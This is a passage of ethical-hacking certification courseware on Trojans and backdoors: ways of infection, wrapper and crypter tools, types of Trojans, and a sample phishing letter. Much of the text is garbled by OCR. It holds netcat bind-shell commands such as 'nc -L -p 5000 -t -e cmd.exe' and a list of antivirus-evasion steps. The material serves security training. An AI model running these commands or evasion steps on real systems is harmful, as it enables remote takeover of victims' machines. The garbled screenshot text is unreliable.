  • 26. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Wrapper Covert Programs ‫׳‬fi-V 6 TlLMI C u c ‫ ־‬rf*C «‫ ־‬A 5 rtfte H 5e te c CEH [n rrio ja vi TrOjaa.Net Advanced File Joiner version 1.0 M.11'. All I rl1.3j‫־‬q s rte jw u ! 1 C rn ll^ i C::t» FJt5 « | IC ^ ocumtrt* aij ® D □ 1c1‫״‬ c!D ifrtt9rf[Sir?1 j I H ffi 'Cn'W.'Ui. » * 5 »> 6 SC8 LAB’S 3 ««b Pronessonal Malware Tod | !• r fl H rfrr.fvli t tndcx ) Crrptor Blndtr Downloador [ Spreader Kriptomatik !_________________________ Nome______| Poll‫־‬ SC&Ldb... C:D0CUmemts arid S(1M ir1QsAtl111i .. No .1 ^ d‘ j0 " " ‫| ־‬cument$. .‫ ״‬j!to__ _ . V ‫־־‬ j No | Advanced File Joiner |T ea c e file wig 74K h tta h d s e h 1 B SCB LAB's - Professional Malware Tool Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Wrapper Covert Programs K rip to m atik Kriptomatik is a wrapper covert program that is designed to encrypt and protect files { against crackers and antivirus software. It spreads via Bluetooth and allows you to burn CD/DVDs with Autorun. It has the following features: 0 Configure icons 0 Gather files e Posts © Propagation 0 Other features such as autostart, attributes, encryption, etc. Module 06 Page 852 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 27. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors File Nam e jJjIxRAYMYPC-INSTALL.MSI Hb8thc.exe File Path File Size C:DocumentsandSettingsk-ADes... C:Documents and Settings .,Des... 4M b 379 Kb Inject To %apppath% %apppath% Extract To %none% %none% ► Plugin Count: 0006 Status : all spread com ands unchecked... m FIGURE 6.6: Kriptomatik screenshot 5 -----® A dv an ced F ile Jo in er Advanced File Joiner is software that is used to combine and join various files into a single file. If you have downloaded multiple pieces of a large file split into smaller files, you may easily join them together with this tool. For example, you can combine ASCII text files or combine video files such as MPEG files into a single file if and only if they are of same size, format, and encoding. This tool cannot be used effectively for joining a file format containing head information such as AVI, BMP, JPEG, and DOC files. So, for each of these types of file formats, you have to use specific software join program. Module 06 Page 853 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 28. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors File List Anti Debugging Com Ftes Event Logs About pile |© C:Docum | ents and Settings^ V>esktopM usic.wav 58 nc:Documents and Settings Desktopiusion_b... 392 Kb Add To File File Path: 1 1 Execute: Yes FIGURE 6.7: Advanced File Joiner Screenshot Module 06 Page 854 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 29. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors SCB LAB’s - P ro fessio n al M alw are Tool Professional Malware Tool is designed to encrypt (crypter), together (binder), download (downloader), and files spread (spread). SC8 LAB'S Profiesswial Malware Tool t ,V - «■ ‫׳‬ Index | Crypter Name Binder Downloader Spreader Path Execute ] SC B Lab... C:DocumentsandSettingsAdmi... *“ icuments and SettingsAdmi... Add file Execute ► Yes Build! No No No Remove file |The attached files weigh 714 KB FIGURE 6.8: SCB LAB's - Professional Malware Tool Screenshot Module 06 Page 855 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 30. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors D ifferent Ways a Trojan can Get into a S ystem Instant Messenger applications r IRC (Internet Relay Chat) 1 r 2 Legitimate "shrinkwrapped" software packaged by a disgruntled employee 3 Browser and email software bugs Physical Access 4 Attachments 5 r 6 Fake programs 7 Untrusted sites and freeware software CEH r 8 NetBIOS (FileSharing) 9 Downloading files, games, and screensavers from Internet sites Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. D ifferent W ays a T ro jan C an G et into a System Different access points are used by Trojans to infect the victim's system. With the help of these points, the Trojan attacks the target system and takes complete control over the system. They are as follows: In s ta n t M e s s e n g e r A p p licatio n s The system can get infected via instant messenger applications such as ICQ or Yahoo Messenger. The user is at high risk while receiving files via the messenger, no matter from whom or from where. Since there is no file checking utility bundled with instant messengers, there is always a risk of infection by a Trojan. The user can never be 100% sure who is on the other side of the computer at any particular moment. It could be someone who hacked a messenger ID and password and wants to spread Trojans over the hacked friends list. IRC (In te rn et R elay C hat) tA IRC is another method used for Trojan propagation. Trojan.exe can be renamed something like Trojan.txt (with 150 spaces).exe. It can be received over IRC and, in the DCC (Direct Client to Client), it will appear as •TXT. The execution of such files will cause infection. Most people do not notice that an application (.exe) file has a text icon. So before Module 06 Page 856 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 31. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors such things are run, even if it is with a text icon; the extensions must be checked to ascertain that they are really .TXT files. 9 Do not download any files that appear to be free porn or Internet software. Novice computer users are often targets of these false offers, and many people on IRC are unaware of security. Users get infected from porn-trade channels, as they are not thinking about the risks involved—just how to get free porn and free programs. irt ‫ !1־‬P h y sic a l A ccess ‫־‬ LiJ 0 Restricting physical access is important for a computer's security. Example: 9 A user's friend wants to have physical access to his system. The user might sneak into his friend's computer room in his absence and install a Trojan by copying the Trojan software from his disk onto the hard drive. 9 Autostart is another way to infect a system while having physical access. When a CD is placed in the CD-ROM tray, it automatically starts with a setup interface. An example of the Autorun.inf file that is placed on such CDs: [autorun] open=setup.exe icon=setup.exe 9 Trojan could be run easily by running a real setup program. 9 Since many people do not know about this CD function, their machine might get infected, and they would not understand what happened or how it was done. 9 The Autostart functionality should be turned off by doing the following: Start ‫ >־‬Settings ‫ >־‬Control Panel -> System ‫־‬ Properties ■) Settings Device Manager ■ CDROM ‫>־‬ ‫־‬ > ‫־‬ Once there, a reference to Auto Insert Notification will be seen. (It checks approximately once per second whether a CD-ROM has been inserted, or changed, or not changed.) To avoid any problems with this function, it should be turned off. B row ser an d E m ail Softw are B ugs Users do not update their software as often as they should, and many attackers take advantage of this well-known fact. Imagine an old version of Internet Explorer being used. A visit to a malicious site will automatically infect the machine without downloading or executing any program. The same scenario occurs while checking email with Outlook Express or some other software with well-known problems. Again, the user's system will be infected without even downloading an attachment. The latest version of the browser and email software should be used, because it reduces the risk of these variations. Module 06 Page 857 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 32. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors 9 Check the following sites to understand how dangerous these bugs are, all due to the use of an old version of the software: 9 http://www.guninski.com/browsers.html 9 http://www.guninski.com/netscape.html F ak e P ro g ra m s 9 Attackers can easily lure a victim into downloading free programs that are suitable for their needs, and loaded with features such as an address book, access to check several POP3 accounts, and many other functions that make it even better than the currently used email client. 9 The victim downloads the program and marks it as TRUSTED, so that the protection software fails to alert him or her of the new software being used. The email and POP3 account passwords are mailed directly to the attacker's mailbox without anyone noticing. Cached passwords and keystrokes can also be mailed. The aim is to gather ample information and send it to the attacker. 9 In some cases, an attacker may have complete access to a system, but what the attacker does depends on his or her ideas about how to use the hidden program's functions. While sending email and using port 25 or 110 for POP3, these could be used for connections from the attacker's machine (not at home, of course, but from another hacked machine) to connect and use the hidden functions they implemented in the freeware program. The idea here is to offer a program that requires a connection with a server be established. 9 Attackers thrive on creativity. Consider an example where a fake audio galaxy, which is a site for downloading MP3, is given. An attacker generates such a site by using 15-gb space on his system to place a larger archive there for the MP3. In addition, some other systems are also configured in the same fashion. This is done to fool users into thinking that they are downloading from other people who are spread across the network. The software acts as a backdoor and will infect thousands of naive users using ADSL connections. 9 Some fake programs have hidden codes, but still maintain a professional look. These websites link to anti-Trojan software, thus fooling users into trusting them. Included in the setup is readme.txt. This can deceive almost any user, so proper attention needs to be given to any freeware before it is downloaded. This is important because this dangerous method is an easy way to infect a machine via Trojans hidden in the freeware. Module 06 Page 858 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 33. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors —. S h rin k -W rap p ed Software ‫| י‬ Legitimate "shrink-wrapped" software packaged by a disgruntled employee can contain Trojans. Via A ttach m en ts When unaware web users receive an email saying they will get free porn or free Internet access if they run an attached .exe file, they might run it without completely understanding the risk to their machines. 0 Example: 0 A user has a good friend who is carrying out some research and wants to know about a topic related to his friend's field of research. He sends an email to his friend asking about the topic and waits for a reply. The attacker targeting the user also knows his friend's email address. The attacker will simply code a program to fake the email From: field and make it appear to be the friend's email address, but it will include the TROJANED attachment. The user will check his email, and see that his friend has answered his query in an attachment, and download and run it without thinking that it might be a Trojan. The end result is an infection. 0 Trash email with the subject line, "Microsoft IE Update," without viewing it. 0 Some email clients, such as Outlook Express, have bugs that automatically execute the attached files. U ntru sted Sites an d F re e w a re Softw are 0 A site located at a free web space provider or one just offering programs for illegal activities can be considered suspicious. 0 There are many underground sites such as NeuroticKat Software. It is highly risky to download any program or tool located on such a suspicious site that can serve as a 0 conduit for a Trojan attack on a victim's computer. No matter what software you use, are you ready to take that risk? 0 Many sites are available that have a professional look and contain huge archives. These sites are full of feedback forms and links to other popular sites. Users must take the time to scan such files before downloading them, so that it can be determined whether or not they are coming from a genuine site or a suspicious one. 0 Software such as mIRC, ICQ, PGP, or any other popular software must be downloaded from its original (or official dedicated mirror) site, and not from any other websites that may have links to download supposedly the same software. 0 Webmasters of well-known security portals, who have vast archives with various "hacking" programs, should be responsible for the files they provide and scan them often with anti-virus and anti-Trojan software to guarantee the site to be "free of Trojans and viruses." Suppose an attacker submits a program infected with a Trojan, Module 06 Page 859 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 34. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors 9 e.g., a UDP flooder, to the webmaster for the archive; if the webmaster is not alert, the attacker may use the webmaster's irresponsibility to infect the site's files with a Trojan. tJ Users who deal with any kind of software or web application should scan their systems on a daily basis. If they detect any new file, it should be examined. If any suspicion arises regarding the file, it must be forwarded to software detection labs for further analysis. Q It is easy to infect machines using freeware programs. ‫״‬Free is not always the best" and hence these programs are hazardous for systems. NetBIOS (File S haring) If port 139 on the system is open, i.e., file sharing is enabled, it can be used by others to access the system, install trojan.exe, and modify a system's file. 9 The attacker can also use a DoS attack to shut down the system and force a reboot, so the Trojan can restart itself immediately. To block file sharing in the WinME version, go to: 9 Start ‫ >־‬Settings -> Control Panel ‫־‬ Network ‫ >־‬File and Print Sharing ‫־‬ 9 Uncheck the boxes there. This will prevent NetBIOS abuse. D ow n lo ad in g Downloading files, games, and screensavers from Internet sites can be dangerous. Module 06 Page 860 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 35. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors How to Deploy a Trojan c EH (c d IUmI K Im rtifw j m M ajor Trojan Attack Paths: » User clicks on the malicious link 8 User opens malicious email attachments Attacker installs the Trojan infecting his machine Trojan Server (Russia) Trojan is sent to the victim Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. How to D eploy a T rojan A Trojan is the means by which an attacker can gain access to the victim's system. In order to gain control over the victim's machine, an attacker creates a Trojan server, and then sends an email to a victim containing a link to the Trojan server. Once the victim clicks on the link sent by the attacker, it connects him or her directly to the Trojan server. The Trojan server sends a Trojan to the victim system. The attacker installs the Trojan, infecting the victim's machine. As a result, victim is connected to the attack server unknowingly. Once the victim connects to an attacker server, the attacker takes complete control over the victim's system and performs any action the attacker chooses. If the victim carries out any online transaction or purchase, then the attacker can easily steal sensitive information such as credit card details, account information, etc. In addition, attackers can also use the victim's machine as the source for launching attacks on other systems. Computers typically get infected by users clicking on a malicious link or opening an email attachment that installs a Trojan on their computers that serves as a back door to criminals who can then command the computer to send spam email. Module 06 Page 861 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 36. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker ru E* v * To hs o no d i* ob »m« o & B *!** i‫־‬ Subject: Hffty Al fat•ft6 x Orlrfa O O Computers typically get infected by clicking on a malicious link or opening an e-mail attachment that installs a Trojan on their computers that serves as a back door to criminals who can then command the computer to send spam email I ■D v Apo« A**a0f•Odorm ?2 7867 Apple Store Call 1-800-MY-APPLE Dear Customer 4 Victim Attacker installs the Trojan infecting his machine The Trojan connects to the attack server Link to Trojan Server xlfnake changes to yelr To view the most up-to-date status 8nd| Apple Online Store order, visit online y|ur Qrc^r Siatus. | You car. aJso contact Apple Store Customer Servicc a: 1-800-576-2775 or vu t cniat for mere nfo:1r.aCoc. Immediately connects to Trojan server in Russia Attacker sends an email to victim containing link to Trojan server Internet Trojan Server la (Russia) Trojan Is sent to the victim FIGURE 6.9: Diagrammatical representation of deploying a Trojan in victims system Module 06 Page 862 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 37. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors E v a d in g A nti-V irus T e c h n iq u es Break the Trojan file into multiple pieces and zip them as single file Never use Trojans downloaded from the web (antivirus can detect these easily) ALWAYS write your own Trojan and embed it into an application Change the content of the Trojan using hex editor and also change the checksum and encrypt the file Change Trojan's syntax: « Convert an EXE to VB script e Change .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hide "known extensions", by default, so it shows up only .DOC, .PPT and .PDF) Copyright © by EG-Gouncil . All Rights Jte$ervfei;Reproduction is Strictly Prohibited. E v ad ing A ntivirus T e c h n iq u e s The following are the various techniques used by Trojans, viruses, and worms to evade most of antivirus software: 1. Never use Trojans downloaded from the web (antivirus detects these easily). 2. Write your own Trojan and embed it into an application. 3. Change the Trojan's syntax: 0 Convert an EXE to VB script 0 Convert an EXE to a DOC file 0 Convert an EXE to a PPT file 4. Change the checksum. 5. Change the content of the Trojan using a hex editor. 6. Break the Trojan file into multiple pieces. Module 06 Page 863 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 38. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors So far, we have discussed various concepts of Trojans and the way they infect the system. Now we will discuss various types of Trojans that are used by attackers for gaining sensitive information through various means. Trojan Concepts J ^— Countermeasures Trojans Infection Anti-Trojan Software Types of Trojans y ‫׳‬ ) Penetration Testing v‫- ׳‬ I 1 Trojan Detection This section covers various types of Trojans such as command-shell Trojans, document Trojans, email Trojans, botnet Trojans, proxy server Trojans, and so on. Module 06 Page 864 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 39. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors CEH T y p e s o f T r o ja n s / i VNC Trojan /*HTTP/HTTPS : : Trojan /*ICMP : ; Trojan / D a ta Hiding*. : ; Trojan a /*Destructive**. : . ‫־‬ Trojan : /*Docum ent ! Trojan a Types of Trojans Various types of Trojans that are intended for various purposes are available. The following is a list of types of Trojans: 0 VNC Trojan 0 Proxy Server Trojan 0 HTTP/HTTPS Trojan 0 Botnet Trojan 0 ICMP Trojan 0 Covert Channel Trojan 0 Command Shell Trojan 0 SPAM Trojan 0 Data Hiding Trojan 0 Credit Card Trojan 0 Destructive Trojan 0 Defacement Trojan © Document Trojan 0 E-banking Trojan 0 GUI Trojan 0 Notification Trojan 0 FTP Trojan 0 Mobile Trojan 0 E-mail Trojan 0 MAC OS X Trojan 0 Remote Access Trojan Module 06 Page 865 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 40. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors C om m and Shell Trojans CEH J Command shell Trojan gives remote control of a command shell on a victim's machine J Trojan server is installed on the victim's machine, which opens a port for attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine Com mand Shell Trojans The command shell Trojan gives remote control of a command shell on a victim's machine. The Trojan server is installed on the victim's machine, which opens a port for the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine. C:> nc <ip> <port> C:> nc -L -p <port> -t -e cmd.exe FIGURE 6.10: Attacker launching command shell Trojan in victim's machine Module 06 Page 866 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 41. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors C o m m a n d S h ell Trojan: N etca t CEH c:>nc.exe -h [▼1.10 NT] connect to listen for options: -d -e -g —G -h -i ‫1־‬ -L -n -o -p -r s canewhere : inbound: prog gateway nu m secs file port -a addr -t -u ‫▼־‬ ‫־‬ -w secs -z n c ]‫־‬options] hostname port[s] [ports [ ... n c -1 -p p o r t [options] [hostname] [port] det a c h f r o m console, stealth mode inbound p r o g r a m to exec [dangerous ! !] source-routing h o p p o i n t [s] , u p to 8 source-routing pointer: 4, 8, 12, ... this cruft d e lay interval for lines sent, ports scanned listen mode, for inbound connects listen harder, re-listen on socket close numeric-only IP a d d r e s s e s , no DNS hex dump of traffic local p o r t number randomize local an d remote ports local source address answer TELNET negotiation UD P mode verbose [use twice to be more verbose] timeout for connects an d final ne t reads zero-l/O mode [used for scanning] p o r t numbers ca n be individual o r ranges: m ‫־‬n — ■ [inclusive] C:> Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. C o m m a n d Shell Trojan: N etcat Using Netcat, an attacker can set up a port or a backdoor that will allow him or her to telnet into a DOS shell. With a simple command such as C:>nc -L -p 5000 -t -e cmd.exe, the attacker can bind port 5000. With Netcat, the user can create outbound or inbound connections, TCP or UDP, to or from any port. It provides for full DNS forward/reverse checking, with appropriate warnings. Additionally, it provides the ability to use any local source port, any locally configured network source address, and it comes with built-in port-scanning capabilities. It has a built-in loose source-routing capability and can read command-line arguments from standard input. Another feature is the ability to let another program respond to inbound connections (another program service established connections). In the simplest usage, ‫״‬nc host port" creates a TCP connection to the given port on the given target host. The standard input is then sent to the host, and anything that comes back across the connection is sent to the standard output. This continues indefinitely, until the network side of the connection shuts down. This behavior is different from most other applications, which shut everything down and exit after an end-of-file on the standard input. Netcat can also function as a server by listening for inbound connections on arbitrary ports, and then doing the same reading and writing. With minor limitations, Netcat does not really care if it runs in client or server mode; it still moves data back and forth until there is none left. In either mode, shutdown can be forced after a configurable time of inactivity on the network side. Module 06 Page 867 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 42. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Features: 0 Outbound or inbound connections, TCP or UDP, to or from any port 0 Full DNS forward/reverse checking, with appropriate warnings 0 Ability to use any local source port 0 Ability to use any locally configured network source address 0 Built-in port-scanning capabilities, with randomizer 0 Built-in loose source-routing capability 0 Can read command-line arguments from standard input 0 Slow-send mode, one line every N seconds 0 Hex dump of transmitted and received data 0 Optional ability to let another program service establish connections 0 Optional telnet-options responder using the command nc - -p 23 -t -e cmd.exe I 0 Where 23 is the port for telnet, - option is to listen, -e option is to execute, -t option I tells Netcat to handle any telnet negotiation the client might expect Netcat is a utility used for reading and writing the networks that support TCP and UDP protocols. It is a Trojan that is used to open either the TCP or UDP port on a target system and hackers with the help of Telnet gain the access over the system. Command Prompt c:>nc.exe -h [vl.10 NT] connect to somewhere : listen for inbound: options: -d -e prog -g gateway -G num -h -i secs -1 -L -n -o file ‫־‬P port -r -s addr -t -u -v -w secs -z ▲ nc [-options] hostname port[s] [ports] ... nc -1 -p port [options] [hostname] [port] detach from console, stealth mode inbound program to exec [dangerous!!] source-routing hop point[s], up to 8 source-routing pointer: 4, 8, 12, ... this cruft delay interval for lines s e n t , ports scanned listen m o d e , for inbound connects listen harder, re-listen on socket close numeric-only IP addresses, no DNS hex dump of traffic local port number randomize local and remote ports local source address answer TEI2JET negotiation UDP mode verbose [use twice to b e more verbose] timeout for connects and final net reads zero-l/O mode [used for scanning] ■ ■ port numbers can be individual or ranges: m-n [inclusive] C:> FIGURE 6.11: Netcat screenshot Module 06 Page 868 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 43. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors GUI T ro ja n : M o S u c k e r MoSucker 3.0 Selected Server: |z & 8Module 0 Trojans and BackdoorsTrojans Type :C tv 6 Server ID: Cypher Key: Victim's Name: Server Name(s): Extension(*): Cormecbon-eort: [ £‫ ב‬Close 15017MQWEY3C:4264200TPGNDEVC ‫־־‬ TWQPCUL25873IVFCSJQK13761 1 |vk:t m ] kerne!32,msc0nfig,vvinexec32,netconfig‫״‬ exe,p!f‫״‬t>at,(i,jpe,com,bpq,xtr,txp, ] O ‫ש‬ ‫ש‬ ‫ש‬ 0 ‫ש‬ |4288| W Prevent same server multHnfecbons (recommended) ‫ש‬ You may select a windows icon to assooate with your custom file extension/s. Sead Save Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. GUI Trojan: M oS ucker Source: http://www.dark-e.com MoSucker is a Visual Basic Trojan. MoSucker's edit server program lets the infection routine be changed and notification information set. MoSucker can auto load with the system.ini and/or the registry. Unlike any other Trojan, MoSucker can be set to randomly choose which method to auto load. It can notify cell phones via SMS in Germany only. MuSucker's edit server can gain X number of kilobytes (X is either a static number or it is random each time). The standard error message for MoSucker is "Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file, try downloading again." Here is a list of file names MoSucker suggests to name the server: MSNETCFG.exe, unin0686.exe, Calc.exe, HTTP.exe, MSWINUPD.exe, Ars.exe, NETUPDATE.exe, and Register.exe. Server Features: 0 Chat with victim Q Clipboard manager © Close/remove server e Control mouse 9 Crash System File Manager Module 06 Page 869 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 44. Exam 312-50 Certified Ethical Hacker Ethical Hacking and Countermeasures Trojans and Backdoors 0 Get passwords entered by user, system info 0 Hide/Show start button, system tray, taskbar 0 Keylogger 0 Minimize all windows 0 Open/close CD-ROM drive 0 Ping server 0 Pop-up startmenu 0 Process manger 0 Shutdown/Reboot/Standby/Logoff/Dos mode server 0 System keys on/off 0 Window manager About | Options | S 3 _ ‫א‬ £N Q t Misc stuff Information File related System 5 ‫׳/'׳ ־‬ ‫ ׳‬f t ‫;׳‬ Spy related Fun stuff I version 3.0 Fun stuff II Live capture u iw iu .m a s u c k c r . t h FIGURE 6.12: MoSucker screenshot Module 06 Page 870 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 45. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors * MoSucker 3.0 Selected Server |z:CEHv8 Module 06 Trojans and BackdoorsTrojans Type C clClose Name/Port Password Autostart Server ID: Cypher Key: Notification 1 Victim's Name: Notification 2 Server Name(s): Options Extension (s): Keylogger Connection-gort: TWQPCUL25873IVFCSJQK13761 Victim kemel32‫׳‬msc0nfigrwinexec32,netconfig‫׳‬ exe,pif,bat,dli‫׳‬jpe‫׳‬comrbpq,xtr,txp, ‫ש‬ ‫ש‬ 4288| [‫ /י‬Prevent same server multi-infections (recommended) Plug-ins/Kill Fake Error < O ‫ש‬ ‫ש‬ ‫ש‬ 1501704QWEYX:4264200TPGNDEVC Events Bind Files | > You may select a windows icon to associate with your custom file extension/s. File Properties Icons Read Save Exit FIGURE 6.13: MoSucker showing victim's name and connection port Module 06 Page 871 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 46. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors GUI Trojan: Jum per and Biodox CEH Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. GUI Trojan: J u m p e r a n d Biodox Jumper is a malicious malware program that performs many functions to download malicious malware from the Internet. Attackers use this jumper Trojan to get sensitive data like financial information from the user's system. It also downloads additional downloads for the attacker to be able to access the system remotely. Generally, the BIODOX OE Edition.exe file should be in the C:WindowsSystem32 folder; if it has been found elsewhere, then it is a Trojan. Once the computer gets infected by the Biodox, the system performance decreases. The screensaver gets changed automatically. Continuous annoying advertisement pop-ups appearing on the computer can be treated as one of the symptoms of this Trojan. Module 06 Page 872 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 47. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors ftodox Open Source t *‫׳‬ID 0 4 432 soc 544 li-Jcsss-eie 552 m y * ■ r ■ MO ‫׳‬ ■ 628 MO 648 J 'r e . ‫־‬ S36 UsvOwsteJie we 1‫.•* |י‬cfcott t x t 992 Ut svetwst n r I 1016 3r.cN> st ext 244 296 S jU t o c * . _Jr.ch 0 it t x t 360 L-J [system pr. D um m , Status - weerufuly System Sy»tem System System System System System System System System System System System System System System System " ‫ ׳0 "׳׳‬V 0 0 929792 5*01632 7430144 4t496*« 62873 60 7188480 10*21*32 4612800 641*432 7192576 9965568 7016448 33181696 12562432 12091392 » ‫, ״‬ . 1 • Non* Normal Norm* Normal Norm ■ Norm* S0rr» Norma( Norm* Norm* Norm ■ Norm ■ Normal a M Clear Applicator Lht FIGURE 6.13: Screenshots showing Biodox and Jumper Module 06 Page 873 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 48. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors D ocum ent Trojans VIA LETTER John Stevens Royal Communications Company 445 152thStreet S.W. Washington, DC 20554 FecEx September 2, 2012 CEH !B e! Attacker RE: Fedex Shipment Airway Bill Number: 867676340056 Dear Mr. Stevens: We have received a package addressed to you at the value of USD 2,300. The custom duty has not been paid for this shipment which is listed as Apple iMac 24‫ ׳‬Computer. Please call us at Fedex at 1800-234-446 Ext 345 or e-m me at ail m.roberts@fedex.com regarding this shipment. Please visit our Fedex Package Tracking Website to see more details about this shipment and advice us on how to proceed. The website link is attached with this letter. Attacker embeds Trojan into a Word document and infects victim computer Victim's Package Trojan embedded in Word document Sincerely, Michelle Roberts Customer Service Representative International Shipment and Handling Fedex Atlanta Division Tel: 1800-234-446 Ext 345 http://www.fedex.com m.roberts@fedex.com System Trojan is executed as victim opens the document and clicks on Trojan package Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. D o c u m en t T ro jan s Most users usually have the tendency to update their operating system but not the application they use regularly. Attackers take this opportunity to install document Trojans. Attackers usually embed a Trojan into a document and transfer it in the form of an attachment in emails, office documents, web pages, or media files such as flash and PDFs. When a user opens the document with the embedded Trojan assuming it is a legitimate one, the Trojan is installed on the victim's machine. This exploits the application used to open the document. Attackers can then access sensitive data and perform malicious actions. Module 06 Page 874 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 49. Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker Trojans and Backdoors Attacker m Attacker embeds Trojan into a Word document and infects victim computer ® ‫ז ־!!! ־‬ s m Trojan is executed as victim opens the document and clicks on Trojan package FIGURE 6.13: Attacker infecting victim's machine using Document Trojan An example of a Trojan embedded in a Word document is as follows: VIA LETTER John Stevens R^alC^muniraUonsCompany 445 152thStreet S.W. Washington, DC 20554 FecEx Sep tem b er 2, 2012 r RE: Fedex Shipment Airway Bill Number: 867676340056 Dear Mr. Stevens: W e have received a package addressed to you at the value of USD 2,300. The custom duty has not been paid for this shipment which is listed as Apple iMac24' Computer. Please call us at Fedex at 1800-2 34-446 Fxt 3450r e-mail meat m.robcrts(S>fedex.com regarding this shipment. Please visit our Fedex Package Tracking website to see more details about this shipment and advice us on howto proceed. The website link is attached with this letter. '• ‫* ״‬ ‫ -י‬Pc a e akQ Trojan embedded in Word document Sincerely, Michelle Roberts Customer Service Representative International Shipment and Handling Fedex Atlanta Division Tel: 1800-234-446 Ext 345 http://www.fedex.com m.rohertsgOfpdex.com Module 06 Page 875 Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
